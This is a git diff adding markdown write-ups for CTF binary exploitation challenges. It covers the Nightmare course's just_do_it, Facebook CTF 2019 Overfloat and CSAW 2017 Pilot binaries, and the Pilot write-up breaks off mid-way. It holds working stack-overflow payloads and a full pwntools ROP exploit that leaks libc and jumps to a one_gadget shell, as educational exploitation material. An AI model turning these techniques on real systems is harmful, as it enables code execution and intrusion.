+So our input text passes into an fget call, which means that even though we have the password, the fgets call will append a newline character (0x0a) at the end, so to pass the check we need a nullbyte after P@SSW0RD, to do so we will use python:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/2 ] [binexp/2/justdoit]
+ → ./just_do_it
+ Welcome my secret service. Do you know the password?
+ Input the password.
+ P@SSW0RD
+ Invalid Password, Try Again!
+
+ [ 192.168.100.126/24 ] [ /dev/pts/2 ] [binexp/2/justdoit]
+ → python -c 'print "P@SSW0RD" + "\x00"'
+ P@SSW0RD
+
+ [ 192.168.100.126/24 ] [ /dev/pts/2 ] [binexp/2/justdoit]
+ → python -c 'print "P@SSW0RD" + "\x00"' | ./just_do_it
+ Welcome my secret service. Do you know the password?
+ Input the password.
+ Correct Password, Welcome!
+
+
+
+Now here we basically managed to pass the check, but that's not it, we see from the disassembly code that the fgets call can input 32 bytes worth of data (looking at the stack below : 0x28 - 0x18 = 16 (since it's hexadecimal)).
+
+
+
+with this we can reach the output message being printed with a puts call, right before the function returns, so let's take another look at the code portion where flag.txt is handled:
+
+
+ local_18 = fopen("flag.txt","r");
+ if (local_18 == (FILE *)0x0) {
+ perror("file open error.\n");
+ /* WARNING: Subroutine does not return */
+ exit(0);
+ }
+ pcVar1 = fgets(flag,0x30,local_18);
+ if (pcVar1 == (char *)0x0) {
+ perror("file read error.\n");
+ /* WARNING: Subroutine does not return */
+ exit(0);
+ }
+
+
+
+What we see here is that after it opens the flag.txt file, it scans in 48 bytes (here its 0x30 bytes in hexa). So the idea here is to find the address of where the flag file is stored, and then, to overwrite the value of the output message (puts call) with it to print the contents of flag:
+
+
+ flag XREF[2]: Entry Point(*), main:08048650(*)
+ 0804a080 00 00 00 undefine
+ 00 00 00
+ 00 00 00
+ 0804a080 00 undefined100h [0] XREF[2]: Entry Point(*), main:08048650(*)
+ 0804a081 00 undefined100h [1]
+
+ [...]
+
+ 0804a0aa 00 undefined100h [42]
+ 0804a0ab 00 undefined100h [43]
+ 0804a0ac 00 undefined100h [44]
+ 0804a0ad 00 undefined100h [45]
+ 0804a0ae 00 undefined100h [46]
+ 0804a0af 00 undefined100h [47]
+
+
+
+After double clicking on the flag variable, we get the code above, so we know that flag is at the address 0x0804a080, now if we look at the beginning of main, we see that the input variable (local_28) and the output message (local 14) are separated by 20 bytes worth of data:
+
+
+
+
+ **************************************************************
+ * FUNCTION *
+ **************************************************************
+ undefined main(undefined1 param_1)
+ undefined AL:1
+ undefined1 Stack[0x4]:1 param_1 XREF[1]: 080485bb(*)
+ undefined4 Stack[0x0]:4 local_res0 XREF[1]: 080485c2(R)
+ undefined4 Stack[-0xc]:4 local_c XREF[1]: 08048704(R)
+ undefined4 Stack[-0x14]:4 local_14 XREF[2]: 0804860d(W),
+ 080486ee(W)
+ undefined4 Stack[-0x18]:4 local_18 XREF[3]: 08048625(W),
+ 08048628(R),
+ 0804864b(R)
+ undefined1 Stack[-0x28]:1 local_28 XREF[2]: 080486a6(*),
+ 080486d9(*)
+ main XREF[4]: Entry Point(*),
+ _start:080484d7(*), 0804886c,
+ 080488c8(*)
+ 080485bb 8d 4c 24 04 LEA ECX=>param_1,[ESP + 0x4]
+
+
+
+Now let's highlight just the parts we need:
+
+
+
+0x28 - 0x14 = 20 bytes, so let's create a payload that has 20 null bytes:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/justdoit]
+ → python -c 'print "\x00"*20 + "\x80\xa0\x04\x08"'
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/justdoit]
+ → python -c 'print "\x00"*20 + "\x80\xa0\x04\x08"' | xxd
+ 00000000: 0000 0000 0000 0000 0000 0000 0000 0000 ................
+ 00000010: 0000 0000 80a0 0408 0a .........
+
+
+
+here we can see with xxd what the payload looks like, now let's try it on the binary:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/justdoit]
+ → python -c 'print "\x00"*20 + "\x80\xa0\x04\x08"' | ./just_do_it
+ Welcome my secret service. Do you know the password?
+ Input the password.
+ flag{g0ttem_b0yz}
+
+
+
+And there we have it!
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
diff --git a/2/overf.md b/2/overf.md
new file mode 100644
index 0000000..acb6d33
--- /dev/null
+++ b/2/overf.md
@@ -0,0 +1,396 @@
+# Facebook CTF 2019 Overfloat
+
+## Downloading the binary file
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/overf]
+ → wget -q https://github.com/guyinatuxedo/nightmare/raw/master/modules/08-bof_dynamic/fb19_overfloat/overfloat
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/overf]
+ → wget -q https://github.com/guyinatuxedo/nightmare/raw/master/modules/08-bof_dynamic/fb19_overfloat/libc-2.27.so
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/overf]
+ → wget -q https://github.com/guyinatuxedo/nightmare/raw/master/modules/08-bof_dynamic/fb19_overfloat/core
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/overf]
+ → l
+ total 4.3M
+ drwxr-xr-x 2 nothing nothing 4.0K Mar 6 19:11 .
+ drwxr-xr-x 12 nothing nothing 4.0K Mar 6 19:10 ..
+ -rw-r--r-- 1 nothing nothing 2.3M Mar 6 19:11 core
+ -rw-r--r-- 1 nothing nothing 2.0M Mar 6 19:10 libc-2.27.so
+ -rw-r--r-- 1 nothing nothing 14K Mar 6 19:10 overfloat
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/overf]
+ → file overfloat
+ overfloat: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=8ae8ef04d2948115c648531ee0c12ba292b92ae4, not stripped
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/overf]
+ → chmod +x overfloat
+
+
+
+` ![]()
+
+## Solution
+
+Now let's start off by testing the binary after using pwn checksec on it:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/overf]
+ → pwn checksec overfloat
+ [*] '/home/nothing/binexp/2/overf/overfloat'
+ Arch: amd64-64-little
+ RELRO: Partial RELRO
+ Stack: No canary found
+ NX: NX enabled
+ PIE: No PIE (0x400000)
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/overf]
+ → ./overfloat
+ _ .--.
+ ( ` )
+ .-' `--,
+ _..----.. ( )`-.
+ .'_|` _|` _|( .__, )
+ /_| _| _| _( (_, .-'
+ ;| _| _| _| '-'__,--'`--'
+ | _| _| _| _| |
+ _ || _| _| _| _|
+ _( `--.\_| _| _| _|/
+ .-' )--,| _| _|.`
+ (__, (_ ) )_| _| /
+ `-.__.\ _,--'\|__|__/
+ ;____;
+ \YT/
+ ||
+ |""|
+ '=='
+
+ WHERE WOULD YOU LIKE TO GO?
+ LAT[0]: 1
+ LON[0]: 2
+ LAT[1]: 3
+ LON[1]: 4
+ LAT[2]: 5
+ LON[2]: 6
+ LAT[3]: 7
+ LON[3]: 8
+ LAT[4]: 9
+ LON[4]: 10
+ LAT[5]: 0
+ LON[5]: 11
+ LAT[6]: 111111111111111111111111111111
+ LON[6]: 111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
+ LAT[7]: LON[7]: 12334556778
+ LAT[8]: ^C
+
+
+
+So we cna see that we are given a 64bit, dynamically linked binary with a non-executable stack (NX). In addition to that, we are given the libc file **libc-2.27.so**. Running the program we see that it prompts us for latitude / longitude pairs, so let's check out what we can find when we reverse the file with ghidra:
+
+
+
+
+ undefined8 main(void)
+
+ {
+ undefined local_38 [48];
+
+ setbuf(stdout,(char *)0x0);
+ setbuf(stdin,(char *)0x0);
+ alarm(0x1e);
+ __sysv_signal(0xe,timeout);
+ puts(
+ " _ .--. \n ( ` ) \n .-\' `--, \n _..----.. ( )`-. \n .\'_|` _|` _|( .__, )\n /_| _| _| _( (_, .-\' \n ;| _| _| _| \'-\'__,--\'`--\' \n | _| _| _| _| | \n _ || _| _| _| _| \n _( `--.\\_| _| _| _|/ \n .-\' )--,| _| _|.` \n (__, (_ ) )_| _| / \n `-.__.\\ _,--\'\\|__|__/ \n ;____; \n \\YT/ \n || \n |\"\"| \n \'==\' \n\nWHERE WOULD YOU LIKE TO GO?"
+ );
+ memset(local_38,0,0x28);
+ chart_course(local_38);
+ puts("BON VOYAGE!");
+ return 0;
+ }
+
+
+
+Looking through the code here, we see that the part that's interesting is the char_course function, which takes the pointer local_38 as an arguement. When we look at the chart_course dissassembled function in ghidra we see the following:
+
+
+ void chart_course(long param_1)
+
+ {
+ int iVar1;
+ uint uVar2;
+ double dVar3;
+ char local_78 [104];
+ float local_10;
+ uint local_c;
+
+ local_c = 0;
+ do {
+ if ((local_c & 1) == 0) {
+ iVar1 = (int)local_c / 2;
+ uVar2 = iVar1 + ((iVar1 / 10 + ((int)(local_c - ((int)local_c >> 0x1f)) >> 0x1f)) -
+ (iVar1 >> 0x1f)) * -10;
+ printf("LAT[%d]: ",(ulong)uVar2,(ulong)uVar2);
+ }
+ else {
+ iVar1 = (int)local_c / 2;
+ uVar2 = iVar1 + ((iVar1 / 10 + ((int)(local_c - ((int)local_c >> 0x1f)) >> 0x1f)) -
+ (iVar1 >> 0x1f)) * -10;
+ printf("LON[%d]: ",(ulong)uVar2,(ulong)uVar2,(ulong)uVar2);
+ }
+ fgets(local_78,100,stdin);
+ iVar1 = strncmp(local_78,"done",4);
+ if (iVar1 == 0) {
+ if ((local_c & 1) == 0) {
+ return;
+ }
+ puts("WHERES THE LONGITUDE?");
+ local_c = local_c - 1;
+ }
+ else {
+ dVar3 = atof(local_78);
+ local_10 = (float)dVar3;
+ memset(local_78,0,100);
+ *(float *)(param_1 + (long)(int)local_c * 4) = local_10;
+ }
+ local_c = local_c + 1;
+ } while( true );
+ }
+
+
+
+Here we see that our data is being scanned into the char ptr that is being passed in the function as an arguement (param_1) It scans 100 bytes of data into local_78 thanks to the memset() function call
+
+
+ dVar3 = atof(local_78);
+ local_10 = (float)dVar3;
+ **memset(local_78,0,100);**
+ *(float *)(param_1 + (long)(int)local_c * 4) = local_10;
+
+
+after the memset call, it is setting ptr + (x * 4) equal to **float** where x is equal to the amount of floats already scanned in. There are no checks to see if the buffer gets overflowed, therefore, we have our buffer overflow right here.
+
+That is ran within a do{}while() loop, that on paper can run forever since we have **true** as the condition. However there the termination condition is if the first 4 bytes of our input are **done** as you can see below:
+
+
+ fgets(local_78,100,stdin);
+ iVar1 = strncmp(local_78,"done",4);
+
+
+Therefore, keep in mind that the buffer that we are overflowing is from the stack in the main function, so we need to return to the main function before we can get code execution. Now let's take a look at the stack in ghidra:
+
+
+ **************************************************************
+ * FUNCTION *
+ **************************************************************
+ undefined main()
+ undefined AL:1
+ undefined1 Stack[-0x38]:1 local_38 XREF[2]: 004009ed(*),
+ 00400a03(*)
+ undefined4 Stack[-0x3c]:4 local_3c XREF[1]: 0040099b(W)
+ undefined8 Stack[-0x48]:8 local_48 XREF[1]: 0040099e(W)
+ main XREF[5]: Entry Point(*),
+ _start:0040075d(*),
+ _start:0040075d(*), 00400ea0,
+ 00400f70(*)
+ 00400993 55 PUSH RBP
+
+
+
+Looking at the stack, there is nothing between local_38 (the variable of our input text) and the saved base pointer. Add on 8 bytes for the saved base pointer to the 48 bytes for the space, of our local_48 variable, and we get a total of **56** bytes to reach the return address. Now what code do we execute ? We're going to go with a ROP Chain using gadgets and imported functions from the binary since PIE is disabled, therefore we don't need an infoleak to do this. The problem is that the binary is not too big so we don't have the gadgets we would need to spawn a shell.
+
+To counter this, we can setup a **puts** call because it is an imported function, therefore we can call it with the **got address of puts** we can get a libc infoleak and then loop back around to the start of **main** which would allow us to exploit the same bug again witha libc infoleak. We can then write a onegadget to the return address to actually spawn a shell.
+
+
+ ****[ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/overf]
+ → objdump -D overfloat| grep puts
+ 0000000000400690 <****puts@plt>:
+ 400690: ff 25 8a 19 20 00 jmp *0x20198a(%rip) # 602020 <****puts@GLIBC_2.2.5>
+ 400846: e8 45 fe ff ff call 400690 <****puts@plt>
+ 400933: e8 58 fd ff ff call 400690 <****puts@plt>
+ 4009e8: e8 a3 fc ff ff call 400690 <****puts@plt>
+ 400a14: e8 77 fc ff ff call 400690 <****puts@plt>
+
+So here we have the plt addrets of **puts** as **0x400690** Next we need the got entry address for puts:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/overf]
+ → objdump -R overfloat| grep puts
+ 0000000000602020 R_X86_64_JUMP_SLOT puts@GLIBC_2.2.5
+
+
+
+Now that we have the got entry address, we need a gadget that pops an arguement into rdi and then return:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/overf]
+ → ROPgadget --binary overfloat| grep ": pop rdi"
+ 0x0000000000400a83 : pop rdi ; ret
+
+
+
+After we get the libc infoleak, we can just subtract the offset of puts from it to get the libc base. The only part that remains is the onegadget, check out the previous babyboi writeup to know how to set it up [here](bboi.html):
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/overf]
+ → one_gadget libc-2.27.so
+ 0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
+ constraints:
+ rsp & 0xf == 0
+ rcx == NULL
+
+ 0x4f322 execve("/bin/sh", rsp+0x40, environ)
+ constraints:
+ [rsp+0x40] == NULL
+
+ 0x10a38c execve("/bin/sh", rsp+0x70, environ)
+ constraints:
+ [rsp+0x70] == NULL
+
+
+
+And with this, we have everything we need to build our exploit. Since all of our inputs are interpreted as floats, We have to jump through a few hoops to get our inputs correctly:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/overf]
+ → vim exploit.py
+
+
+
+
+ from pwn import *
+ import struct
+
+ # values of the rop chain
+ putsPlt = 0x400690
+ putsGot = 0x602020
+ popRdi = 0x400a83
+ startMain = 0x400993
+ oneShot = 0x4f2c5
+
+ #helper functions to help with the float input
+ pf = lambda x: struct.pack('f', x)
+ uf = lambda x: struct.unpack('f', x)[0]
+
+ #target process
+ target = process('./overfloat')
+ libc = ELF('libc-2.27.so')
+
+ #helper function to send input:
+ def sendVal(x):
+ v1 = x & ((2**32) - 1)
+ v2 = x >> 32
+ target.sendline(str(uf(p32(v1))))
+ target.sendline(str(uf(p32(v2))))
+
+ #fill up the space between the start of the input and the return address
+ for i in range(7):
+ sendVal(0xdeadbeefdeadbeef)
+
+ #send the ropchain to print the libc address of puts
+ #loop around to the start of main
+
+ sendVal(popRdi)
+ sendVal(putsGot)
+ sendVal(putsPlt)
+ sendVal(startMain)
+
+ # Send done so our code executes
+ target.sendline(b'done')
+
+ # Print out the target output
+ print(target.recvuntil(b'BON VOYAGE!\n'))
+
+ # Scan in, filter out the libc infoleak, calculate the base
+ leak = target.recv(6)
+ leak = u64(leak + b"\x00"*(8-len(leak)))
+ base = leak - libc.symbols['puts']
+
+ print("libc base: " + hex(base))
+
+ for i in range(7):
+ sendVal(0xdeadbeefdeadbeef)
+ # Overwrite the return address with a onegadget
+ sendVal(base + oneShot)
+
+ # Send done so our rop chain executes
+ target.sendline(b'done')
+
+ target.interactive()
+
+
+
+Now let's test it:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/9 ] [binexp/2/overf]
+ → l
+ total 4.3M
+ drwxr-xr-x 2 nothing nothing 4.0K Mar 6 20:34 .
+ drwxr-xr-x 12 nothing nothing 4.0K Mar 6 19:10 ..
+ -rw-r--r-- 1 nothing nothing 2.3M Mar 6 19:11 core
+ -rw-r--r-- 1 nothing nothing 1.3K Mar 6 20:34 exploit.py
+ -rw-r--r-- 1 nothing nothing 2.0M Mar 6 19:10 libc-2.27.so
+ -rwxr-xr-x 1 nothing nothing 14K Mar 6 19:10 overfloat
+
+ [ 192.168.0.18/24 ] [ /dev/pts/9 ] [binexp/2/overf]
+ → python3 exploit.py
+ [+] Starting local process './overfloat': pid 2897697
+ [*] '/home/nothing/binexp/2/overf/libc-2.27.so'
+ Arch: amd64-64-little
+ RELRO: Partial RELRO
+ Stack: Canary found
+ NX: NX enabled
+ PIE: PIE enabled
+ b' _ .--. \n ( ` ) \n .-\' `--, \n _..----.. ( )`-. \n .\'_|` _|` _|( .__, )\n /_| _| _| _( (_, .-\' \n ;| _| _| _| \'-\'__,--\'`--\' \n | _| _| _| _| | \n _ || _| _| _| _| \n _( `--.\\_| _| _| _|/ \n .-\' )--,| _| _|.` \n (__, (_ ) )_| _| / \n `-.__.\\ _,--\'\\|__|__/ \n ;____; \n \\YT/ \n || \n |""| \n \'==\' \n\nWHERE WOULD YOU LIKE TO GO?\nLAT[0]: LON[0]: LAT[1]: LON[1]: LAT[2]: LON[2]: LAT[3]: LON[3]: LAT[4]: LON[4]: LAT[5]: LON[5]: LAT[6]: LON[6]: LAT[7]: LON[7]: LAT[8]: LON[8]: LAT[9]: LON[9]: LAT[0]: LON[0]: LAT[1]: BON VOYAGE!\n'
+ libc base: 0x7f4b371d8310
+ [*] Switching to interactive mode
+
+ _ .--.
+ ( ` )
+ .-' `--,
+ _..----.. ( )`-.
+ .'_|` _|` _|( .__, )
+ /_| _| _| _( (_, .-'
+ ;| _| _| _| '-'__,--'`--'
+ | _| _| _| _| |
+ _ || _| _| _| _|
+ _( `--.\_| _| _| _|/
+ .-' )--,| _| _|.`
+ (__, (_ ) )_| _| /
+ `-.__.\ _,--'\|__|__/
+ ;____;
+ \YT/
+ ||
+ |""|
+ '=='
+
+ WHERE WOULD YOU LIKE TO GO?
+ LAT[0]: LON[0]: LAT[1]: LON[1]: LAT[2]: LON[2]: LAT[3]: LON[3]: LAT[4]: LON[4]: LAT[5]: LON[5]: LAT[6]: LON[6]: LAT[7]: LON[7]: LAT[8]: BON VOYAGE!
+ [*] Got EOF while reading in interactive
+ $ cat flag
+ flag{g0ttem_b0yz}
+
+
+
+And that's it! We have been able to spawn a shell and print the flag.
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
diff --git a/2/pilot.md b/2/pilot.md
new file mode 100644
index 0000000..2ddf075
--- /dev/null
+++ b/2/pilot.md
@@ -0,0 +1,513 @@
+# CSAW 2017 Pilot
+
+## Downloading the binary file
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/52 ] [binexp/2/pilot]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/06-bof_shellcode/csaw17_pilot/pilot
+ --2021-03-01 14:32:43-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/06-bof_shellcode/csaw17_pilot/pilot
+ Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
+ Resolving github.com (github.com)... 140.82.121.4
+ Connecting to github.com (github.com)|140.82.121.4|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/06-bof_shellcode/csaw17_pilot/pilot [following]
+ --2021-03-01 14:32:44-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/06-bof_shellcode/csaw17_pilot/pilot
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.111.133, 185.199.109.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 10472 (10K) [application/octet-stream]
+ Saving to: ‘pilot’
+
+ pilot 100%[=================================================================>] 10.23K --.-KB/s in 0.002s
+
+ 2021-03-01 14:32:44 (5.39 MB/s) - ‘pilot’ saved [10472/10472]
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/52 ] [binexp/2/pilot]
+ → file pilot
+ pilot: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=6ed26a43b94fd3ff1dd15964e4106df72c01dc6c, stripped
+
+ [ 192.168.0.18/24 ] [ /dev/pts/52 ] [binexp/2/pilot]
+ → chmod +x pilot
+
+
+
+` ![]()
+
+## Solution
+
+First let's run the binary to see what it does:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/52 ] [binexp/2/pilot]
+ → ./pilot
+ [*]Welcome DropShip Pilot...
+ [*]I am your assitant A.I....
+ [*]I will be guiding you through the tutorial....
+ [*]As a first step, lets learn how to land at the designated location....
+ [*]Your mission is to lead the dropship to the right location and execute sequence of instructions to save Marines & Medics...
+ [*]Good Luck Pilot!....
+ [*]Location:0x7ffee9a9c6c0
+ [*]Command:ls
+ [*]There are no commands....
+ [*]Mission Failed....
+
+ [ 192.168.0.18/24 ] [ /dev/pts/52 ] [binexp/2/pilot]
+ → ./pilot
+ [*]Welcome DropShip Pilot...
+ [*]I am your assitant A.I....
+ [*]I will be guiding you through the tutorial....
+ [*]As a first step, lets learn how to land at the designated location....
+ [*]Your mission is to lead the dropship to the right location and execute sequence of instructions to save Marines & Medics...
+ [*]Good Luck Pilot!....
+ [*]Location:0x7ffeeecbfee0
+ [*]Command:help
+
+
+
+The binary basically prints out text with an interesting 'location' memory address, then we enter a command and either it gives us 'mission failed' or it might give us something else. Let's inspect it in ghidra:
+
+
+
+Now unlike the previous challenges, the main function called isn't called 'main' instead it is called 'FUN_004009a6'. Now let's inspect the parts of the code that are interesting:
+
+
+ sVar2 = read(0,local_28,0x40);
+
+
+
+Now here we can see that it scans 0x40 bytes worth of input into the local_28 variable and this variable can only hold 32 bytes worth of input, so this is a buffer overflow vulnerability. The address that is being printed is an infoleak for the start of our input in memory on the stack:
+
+
+
+Now that we know that our local input variable is local_28 let's look at the stack layout in ghidra:
+
+
+ **************************************************************
+ * FUNCTION *
+ **************************************************************
+ undefined FUN_004009a6()
+ undefined AL:1 <****RETURN>
+ undefined1 Stack[-0x28]:1 local_28 XREF[2]: 00400aa4(*),
+ 00400acf(*)
+ FUN_004009a6 XREF[4]: entry:004008cd(*),
+ entry:004008cd(*), 00400de0,
+ 00400e80(*)
+ 004009a6 55 PUSH RBP
+
+Here we don't see anything between the start of our input and the return address, so this means that we should be able to use the overflow vulnerability to overwrite the return address to get code execution. so let's inspect that from gdb, we will set a breakpoint right after the read call, and look at the memory there:
+
+
+ 00400ae0 e8 3b fd CALL read ssize_t read(int __fd, void * __
+ ff ff
+ 00400ae5 48 83 f8 04 CMP RAX,0x4
+
+
+
+The breakpoint will be at 0x00400ae5 because it's right after the read call:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/54 ] [binexp/2/pilot]
+ → gdb ./pilot
+ GNU gdb (GDB) 10.1
+ Copyright (C) 2020 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-pc-linux-gnu".
+ Type "show configuration" for configuration details.
+ For bug reporting instructions, please see:
+ .
+ Find the GDB manual and other documentation resources online at:
+ .
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 92 commands loaded for GDB 10.1 using Python engine 3.9
+ Reading symbols from ./pilot...
+ (No debugging symbols found in ./pilot)
+ gef➤ b *0x400ae5
+ Breakpoint 1 at 0x400ae5
+ gef➤ r
+ Starting program: /home/nothing/binexp/2/pilot/pilot
+ [*]Welcome DropShip Pilot...
+ [*]I am your assitant A.I....
+ [*]I will be guiding you through the tutorial....
+ [*]As a first step, lets learn how to land at the designated location....
+ [*]Your mission is to lead the dropship to the right location and execute sequence of instructions to save Marines & Medics...
+ [*]Good Luck Pilot!....
+ [*]Location:0x7fffffffdf30
+ [*]Command:13371337
+
+ Breakpoint 1, 0x0000000000400ae5 in ?? ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $rax : 0x9
+ $rbx : 0x0000000000400b90 → push r15
+ $rcx : 0x00007ffff7ce0052 → 0x5677fffff0003d48 ("H="?)
+ $rdx : 0x40
+ $rsp : 0x00007fffffffdf30 → 0x3733333137333331 ("13371337"?)
+ $rbp : 0x00007fffffffdf50 → 0x0000000000000000
+ $rsi : 0x00007fffffffdf30 → 0x3733333137333331 ("13371337"?)
+ $rdi : 0x0
+ $rip : 0x0000000000400ae5 → cmp rax, 0x4
+ $r8 : 0xb
+ $r9 : 0x00007fffffffdd00 → 0x0000000000000000
+ $r10 : 0xfffffffffffff61c
+ $r11 : 0x246
+ $r12 : 0x00000000004008b0 → xor ebp, ebp
+ $r13 : 0x0
+ $r14 : 0x0
+ $r15 : 0x0
+ $eflags: [zero CARRY PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0x00007fffffffdf30│+0x0000: 0x3733333137333331 ← $rsp, $rsi
+ 0x00007fffffffdf38│+0x0008: 0x000000000040080a → add cl, ch
+ 0x00007fffffffdf40│+0x0010: 0x00007fffffffe040 → 0x0000000000000001
+ 0x00007fffffffdf48│+0x0018: 0x0000000000000000
+ 0x00007fffffffdf50│+0x0020: 0x0000000000000000 ← $rbp
+ 0x00007fffffffdf58│+0x0028: 0x00007ffff7c17b25 → <__libc_start_main+213> mov edi, eax
+ 0x00007fffffffdf60│+0x0030: 0x00007fffffffe048 → 0x00007fffffffe362 → "/home/nothing/binexp/2/pilot/pilot"
+ 0x00007fffffffdf68│+0x0038: 0x00000001000011bf
+ ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
+ 0x400ad8 mov rsi, rax
+ 0x400adb mov edi, 0x0
+ 0x400ae0 call 0x400820
+ ●→ 0x400ae5 cmp rax, 0x4
+ 0x400ae9 setle al
+ 0x400aec test al, al
+ 0x400aee je 0x400b2f
+ 0x400af0 mov esi, 0x400d90
+ 0x400af5 mov edi, 0x6020a0
+ ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "pilot", stopped 0x400ae5 in ?? (), reason: BREAKPOINT
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x400ae5 → cmp rax, 0x4
+ [#1] 0x7ffff7c17b25 → __libc_start_main()
+ [#2] 0x4008d9 → hlt
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤
+
+
+
+So now we set the breakpoint where we wanted, then ran the binary, put in a simple pattern '13371337' and then we hit our breakpoint. Now let's search for our pattern in memory as well as the address of the return address:
+
+
+ gef➤ search-pattern 13371337
+ [+] Searching '13371337' in memory
+ [+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rwx
+ 0x7fffffffdf30 - 0x7fffffffdf38 → "13371337[...]"
+
+ gef➤ i f
+ Stack level 0, frame at 0x7fffffffdf60:
+ rip = 0x400ae5; saved rip = 0x7ffff7c17b25
+ called by frame at 0x7fffffffe030
+ Arglist at 0x7fffffffdf28, args:
+ Locals at 0x7fffffffdf28, Previous frame's sp is 0x7fffffffdf60
+ Saved registers:
+ rbp at 0x7fffffffdf50, rip at 0x7fffffffdf58
+
+
+Now we see that our pattern is located at 0x7fffffffdf30, and the return address is at 0x7fffffffdf58 so let's calculate the offset in python3:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/52 ] [binexp/2/pilot]
+ → python3
+ Python 3.9.2 (default, Feb 20 2021, 18:40:11)
+ [GCC 10.2.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> hex( 0x7fffffffdf30 - 0x7fffffffdf58 )
+ '-0x28'
+
+
+
+And here we see that we have a 0x28 bytes offset. So our goal here is to create a payload that will first fill the 0x28 offset with nullbytes (\x00) and then we will be able to overwrite the return address, however we must keep in mind that the Location of the pattern changes each time, so we need a way to get it no matter how it changes:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/52 ] [binexp/2/pilot]
+ → ./pilot | grep Location
+ [*]Location:0x7ffdc6df25c0
+ ^C
+
+ [ 192.168.0.18/24 ] [ /dev/pts/52 ] [binexp/2/pilot]
+ → ./pilot | grep Location
+ [*]Location:0x7ffca4cfcef0
+ ^C
+
+ [ 192.168.0.18/24 ] [ /dev/pts/52 ] [binexp/2/pilot]
+ → ./pilot | grep Location
+ [*]Location:0x7ffdaad8fc90
+ ^C
+
+ [ 192.168.0.18/24 ] [ /dev/pts/52 ] [binexp/2/pilot]
+ → ./pilot | grep Location
+ [*]Location:0x7ffed0e90200
+
+
+
+So let's begin to write our python3 exploit:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/52 ] [binexp/2/pilot]
+ → vim exploit.py
+
+
+
+
+ from pwn import *
+
+ target = process('./pilot')
+
+
+ #print the output text until the 'Location:' part
+ print(target.recvuntil("[*]Location:"))
+
+ #right after the 'Location:' part, is the memory address of our input
+ leak = target.recvline()
+
+ inputAdr = int(leak.strip(b"\n"), 16)
+
+ #store the memory address until the newline character (16 characters)
+
+ print(inputAdr)
+
+ payload = ""
+
+
+
+
+Now here we have the variable called 'inputAddr' that is the memory address of our input. Now we need to put in shellcode in the payload, the first 2 writeups of this challenge that i found werent explaining the source of the shellcode that was found, but thankfully there was a writeup that explained it [here](https://0xdeadbeefjerky.com/2017/09/23/csaw-ctf-pilot-writeup.html):
+
